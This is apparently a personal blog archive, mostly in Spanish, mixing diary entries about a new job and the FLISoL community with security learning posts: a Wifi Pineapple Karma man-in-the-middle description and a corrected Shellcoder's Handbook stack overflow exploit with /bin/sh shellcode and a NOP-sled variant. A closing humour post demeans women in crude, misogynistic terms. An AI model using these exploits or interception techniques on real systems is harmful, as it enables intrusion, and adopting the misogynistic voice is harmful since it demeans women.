Ley Augustiana CCIV

“El dolor de panza es directamente proporcional al delicioso sabor de un taco callejero”. Dedicada a Ale

vendetta

El primer día de algo muy diferente

Pfff… hoy ha sido un día emocionante y a la vez “aterrador” o hum.. tal vez eso sea exagerado; pero creo que si estoy algo impresionado.

La semana pasada renuncie a mi anterior empleo, el cual había sido muy cómodo, había días en los que me la pasaba tirado en la cama todo el día sin hacer nada; otros en los que me la pasé mirando series y otros, no muchos esa es la verdad, en donde había que trabajar duro y creo que el no hacer nada durante mucho tiempo era un muy buen motivante a que esos días de trabajo en verdad fueran productivos.

Sin embargo en la nube rosa había algo malo, o al menos era algo que yo llevaba sintiendo un buen tiempo, el estancamiento. Desde hace algún tiempo sentía que no crecía profesionalmente, ya fuese por la especialización que teniamos o por el tamaño propio de la empresa, incluso por las condiciones del mercado que no exigían nuevos proyectos o una diversificación de ellos.

Y como todo lo que me pasa a mi, de pronto la suerte me trajo una oportunidad, muy buena y la acepté. Y como la mayoría de las cosas, lo hice sin pensar, a momentos decía “¿qué hago yo aquí?, si yo tengo una buena vida trabajando en calzoncillos desde mis cobijas”.. pero en fin; creo que algo que tengo y que nunca he podido “frenar” es mi capacidad de decir “si, acepto, me gusta”; aún cuando no estoy seguro, y eso ha sido siempre parte de mi, aceptar las cosas como vienen porque se que si las pienso mucho no las aceptaría, me quedaría en mi área confort y estaría feliz. Desde que era un niño todo lo he hecho así, y por suerte la mayoría de las veces las cosas han sido buenas, muy buenas.

Así que bueno, adios home office, cine entre semana, aburrimiento, lectura.. osea, estaba tan aburrido que hice una certificación durante ese tiempo. Al menos creo que mi tiempo así no fue tan tirado a la basura.

Hoy inicie en mi nuevo trabajo, una empresa muy diferente a las que había conocido, de esas humm.. estrictas/cuadradas, en donde hay que usar traje, hablar con propiedad, peinarse, incluso afeitarse… pero una en donde desde que entras parece más una escuela que un trabajo; tú carga de trabajo es más o menos la misma a tú carga en capacitación, en dónde la gente es talentosa, pero no solo eso, en verdad esta preparada de una forma formal como no lo había visto antes. En donde aún no he conócido a mi equipo y ya hay un proyecto para mi en un país muuuuy lejos, y un proyecto que representa muchas responsabilidades, más de las que en algún momento he tenido, y por si fuera poco, aúnque se supone que ya se hacer las actividades del proyecto, me tendré que preparar para ello antes del proyecto.

Creo que es una buena oportunidad de desarrollo y aprendizaje; y aunque aún no siento que ese sentimiento de decir “wow.. yo de aquí soy” de lo que si tengo sensación es de “wow.. esto esta muy feo, aquí hay que hacer las cosas muy bien”. Es raro, interesante, medio emocionante y muy, pero muy impresionante en el sentido de aterrarme.

Y bueno, por otra parte desde hace poco tiempo he retomado muchas cosas que me gustan y que deje pausadas hace como un año por un periodo no muy bueno de mi vida personal. Hum… intento incluirme de nuevo en proyectos interesantes, hace poco asistí a la reunión de la Comunidad Python de México, que me parece un esfuerzo muy interesante, porque los GULs desaparecieron y esa convivencia de gente técnica ya no existe; y lo que veo ahora es gente que le gusta, asumió el puesto pero en realidad repiten y repiten las mismas cosas sin hacer crecer los proyectos que tienen. También me di la vuelta a un FLISoL que me desilucionó bastante; y esto fue más personal, yo fuí de las persoans que conocieron FLISoL por primera vez de lo que hacían en Colombia y lo trajimos a México, estuve durante muchos años involucrado en la organización, luego por allí una persona se sintió más que los demás y quiso imponer “reglas” a un proyecto que por definición no podía tener reglas, porque era comunitarió, me desacredito al mero estilo López Obrador, con videos que exponian “su verdad” y cosas así de raras; y yo lo único que hice fue redactar una carta que detallaba todos los problemas que se habían susitado, por suerte la gente creyó en mi, algunos tipos más rudos acabaron la reputación de la otra persona y hasta la fecha ya no se sabe mucho de él; pero yo me hice a un lado, seguí participando en las algunas sedes ofreciendo algunas pláticas o talleres y con el tiempo, y con todo el trabajo de BugCON, en realidad me olvidé de FLISoL y hace dos semanas que fui a uno, no pude evitar sentir mal, que evento tan pobre, y no en asistencía, eso no importa, sino en contenidos, en calidad, en la forma de manejarse con la gente… no le veo sentido a algo así cuando la gente se va del evento sin algo aprendido.

Alguna vez mi amigo Etosh me dijo que esa sensación era normal, y que simplemente había crecido y ya otros intereses más avanzados. Pero no lo creo, si en este momento tuviera el tiempo para organizar una sede, los recursos, la gente apoyando… creo que lo haría y lo haría y con un sentimiento de comunidad mayor. Pero bueno, creo que es proyecto que parece perdido, es una lastima. Ojala algún día “aquella” persona que se sintió más que los demás vea lo que ocasionó con sus disputas de ilusión de liderazgo.

Y… algo muy bueno que hoy pasó, no se como, de pronto en twitter algunos amigos estaban hablando de las Piñas y me terminaron metiendo en una plática sobre hacer algunos proyectos de documentación, desarrollo, modificación de los módulos actuales, etc, etc… llegamos a una llamada por Webex en donde no se como acabe allí pero todos hablaban con acentos diferentes, y hemos quedado en algunas actividades, me comprometí en apoyar con algunas cosas; y me parece muy interesante que me hayan invitado siendo que no soy un experto en cosas de networkings, routers o protocolos de red, pero bueno haré lo que pueda :P

Y.. yap.. eso ha sido mi ocupada vida de hoy. ¡Tengo miedo! :P

Titanic

Coyoacan

Coyoacan.- dicese de un lugar con pinta de pueblo pero aroma a ciudad, en dónde los ricos se quieren parecer a los pobres y los pobres se creen cultos e intelectuales.

Get a dynamic function pointer with GDB

In order to use the “Return to libc” technique; you need to get the address memory of some fuctions that are into libc.

Taking advantage that all C programs include libc library, we can get the addresses using whatever program that you want. As a example:

// program.c
main(){}

Then…

Sábado 28 de Abril

Ya ha pasado una semana y aún puedo sentir la suavidad y calidez de tú abrazo… mis labios aún buscan los tuyos… sonrío mientras voy caminando y te recuerdo… ya cuento los días para volver a estar juntos…

¡Muuuacks!… te quiero mucho; PERO yo no soy cursi como dicen por allí u.u

Ley Augustiana CCIII

“La forma más sencilla de empatizar con un argentino es… hablar del chavo del ocho y su torta de hamón”

vendetta

Basic MITM with a Wifi Pineapple

Currently I'm playing with a Wifi Pineapple. I read the documentation by hak5, but is not very large and the quick reference actually is very quick.

So… I really fascinated by the idea of the Pineapple, but is very frustrating that the most part of attacks are very experimental, and not like the Pwnie Express products. But well, that's fine, is interesting trying and trying aaaaand trying again.

Currently I did the most basic attack, and maybe the mainly reason of the Pineapple, a Man In The Middle attack using the Karma module. Karma module is a option to associate any wireless connection to the Pineapple, it works beacause the devices probe periodically connections to routers ask for the well known networks, so Pineapple says “Yes, I'm” (Jasager) and accept this negotiations… and then, in theory, the idea is that the device will connect to the Pineapple and the Pineapple routes the traffic to Internet; so for the device the connection is clean, like the MITM attack by Trapper or Cain.

Well, for do that start the Pineapple, enter to the Web interface and enable de Karma module, and that's all! :D

But What happens with the Internet connection?.. ok, there is a script to do it on Linux, and a complicated configuration for Windows. I don't have Linux installed on my computer, and is very possible that the script doesn't work on OS X, so I'm going to configure the tethering on Windows, but.. tomorrow :P

By the way.. jejeje I saw a video on YouTube where the guy who is explaining the Pineapple work says: “Ok, exist a way to configure the tethearing on Windows, but come on, we'll use Linux once beacuse is more cool”… after I read the method to configure Windows I think that these guy is lying and he configure the Pineapple con Linux beacuse is more easy use the script provided by Hak5 than do a lot of steaps on Windows jejeje :P. Apart from that I think that is a good point to start, so, if you want to check it, you can do it here:

The address problem (solved)

Some days ago I posted about an exploit presented in the book The Shellcoder's handbook, currently I have the reason of why the exploit in the book doesn't work. The code is wrong.

The buffer for the dynamic variables never was asigned, the correct code is:

#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
         printf("Can't allocate memory.\n");
         exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
       *(addr_ptr++) = addr;

  ptr += 4;

  for (i = 0; i < strlen(shellcode); i++)
          *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"BUF=",4);
  putenv(buff);
  system("/bin/bash");

My friend nitr0us told me about the use of NOPslead, in the original paper of Lamagra, the author shows the use of the NOPsled with the same exploit:

#include <stdlib.h>

 #define DEFAULT_OFFSET                    0
 #define DEFAULT_BUFFER_SIZE             512
 #define NOP                            0x90

 char shellcode[] =
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
         *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
         buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
         *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"BUF=",4);
  putenv(buff);
  system("/bin/bash");
}

So, in this exploit the memory is like this:

|| …0x90\0x90\0x90\0x90\0x90\0x90\SHELLCODE\SHELLCODE\SHELLCODE\SHELLCODE\ADDR\ADDR\ADDR\ADDR\ADDR\….||

Pfff… :)

I'm going to read the papers that nitr0us recomended me, I then back to the book… maybe are more mistakes in the book, but I hope that I can distinguish the errors.

La temible brujiperra

… noche de viernes por la noche, un grupo de amigos se encuentran reunidos en un bar, sin embargo la mayoría esta sobrio y preocupado, solo uno de ellos se encuentra ahogado en alcohol, ha vomitado, lleva días de no bañarse, en la barriga se notan las semanas que ha pasado tirado en el colchón, sin dormir pero sin abrir los ojos. ¿La causa?, una mujer le ha herido y arrancando su corazón del pecho tal cual sacrificio azteca. Uno pensaría que es un ñoño que perdió a su primer amor, pero no… es el tipico tipo rudo que viaja en moto, usa chamarra de piel, juega futbol américano y se ha tirado a cuanta ente feminoide se le pone en frente, pero está vez… ha sido victima de una brujiperra… (chan, chan, charan..)

Pero.. ¿quién es este ser casi mitologíco que compite en fama con el chupacabras?…

Para analizar el perfil de la brujiperra y sus principales carácteristicas, primeramente hay que hacer una diferencia. Una brujiperra, como la mayoría confunde, no es una “Mala mujer”, las malas mujeres son otro tipo de entes feminoides que si duelen, pero así como duelen no las puedes dejar, la brujiperra es todo lo contrario, y probablemente es una muestra de la evolución del macho que la brujiperra es odiable y por suerte te termina aburriendo. Pero bueno, comencemos….

Generalidades de la brujiperra

La brujiperra generalmente es una mujer joven, de caracteristas físicas “potables”, osea.. si le dabas y no te le negarias, pero no es digamos como que el hit, generalmente son feas, eso si, pero con maquillaje, putishort y tacones dan el gatazo, estan flacas lo más común es que sin muchas curvas, pero eso si, se sienten hechas a mano por Dios. La brujiperra es facíl, y allí radica una de las diferencias imporantes con la Mala mujer, mientras la Mala mujer calienta el boiler pero no se mete a bañar a menos que sea con alguién que realmente le gusta, la brujiperra se besuquea con quién sea al primer movimiento y con tres cervezas ya se las dio al primer tipo que pasó por allí.

Sin embargo… la brujiperra siempre se creéra una “damita”, le dirá zorra a aquella que le baje al galán y… siempre hablará mal del ente macho con quién termino (tipicos “es un idiota”, “lo tenia chiquito”, “ni sentí nada”, “yiuck”) peroo.. de todas formas le coff.. coff.. aflojara.. sin reparo.

La actitud de la brujiperra es fundamental, porque, creame estimado lector yo he estado en contacto con estas entes feminoides y… no es que actuen, en verdad se creen su actitud. Se creen mejores que las demás mujeres, incluso mujeres visiblemente más bonitas que ellas las ven con inferioridad. En la brujiperra es son comunes las frases “yo mamona pero bonita”, “osea… yo se lo que tengo”, “osea wee.. ¿qué comparas?”

La brujiperra no es muy inteligente que digamos, la brujiperra se le encuentra tipica (pero no exclusivamente) en turismo, relaciones internacionales, idiomas, comunicación o cosas ríduculas como “Licenciatura en cata de vinos”. De niña la potencial brujiperra es facilmente identificable pues es la típica niña güerita con colitas que tiene a todos babeando por ella por su fama de nacha facíl y gusta de humillar hirientemente a las ñoñas, que algún día creceran y se pondrán mejor que ella :P .

Formas de ataque de la brujiperra

Sus formas de ataque son básicas.. bailando te lleva tús manos a sus “curvas” (aunque no te emociones, no hay mucho), te presume que viste sexy, presume y alardea de su amplia experiencia sexual, típicamente te hace sentir el elegido mencionadote que ella no con cualquier naco, etc.

La brujiperra se divierte atacando jovencitos, porque aún no saben como defenderse, pero las victimas preferidas son los entes machos que se creen muy machos y aparentan poder económico. Ojos estimados colegas, una ente feminoide cuando elige a su ente macho, este ya valío, lo exprimira, lo engañara, literalmente se lo coger… coff.. coff.. invitara a su cama frente a sus narices pero jamás lo abandonará. Es común que el ente macho de la brujiperra sea mayor, casos normales de unos 7-10 años de diferencia, aunque algunas brujiperras buscan entes machos de unos 20 años; usualmente casados, divorciados y puede que hasta con chilpayates. Obviamente en estos casos la “Ex” es el enemigo natural de la brujiperra.

Técnicas de defensa ante la brujiperra

Pff… sin experiencia propia existen pocas probabilidades de que sobrevivas al asecho de una brujiperra. No son inteligentes, pero saben como escabullirce, obviamente los entes inocentes son los más faciles de caer pero por lo regular ellas no los eligen como victimas. La mayoría de ustedes en este momento esta recordando una brujiperra y si no, entonces preparence porque algún día sufriran el ataque de una de ella.

Los consejos son pocos, cosas como.. no pagues su cuenta o te dejara pobre, intenta olvidarte de llevarle a un hotel caro, la brujiperra no se lo merece, nada de regalos, nada de joyas, nada de cosas cursis y tiernas, eso demostrará que te tiene en su poder. Si eres su ente macho oficial… pff.. suicidate, estas marcado.

Si ya eres alguién con experiencia en brujiperras disfruta y huye en cuanto puedas sin darle información confiendencial que pueda usar para dar contigo. Las brujiperras usualmente van a los mismos antros, así que empieza a visitar más lugares y obvio, no menciones brujiperras que hayas conocido, la amistas entre este genero feminoide es fuerte.

¿Has tenido una experiencia con una brujiperra?… cuentanos esa historia que le ocurrio al primo de un amigo ;)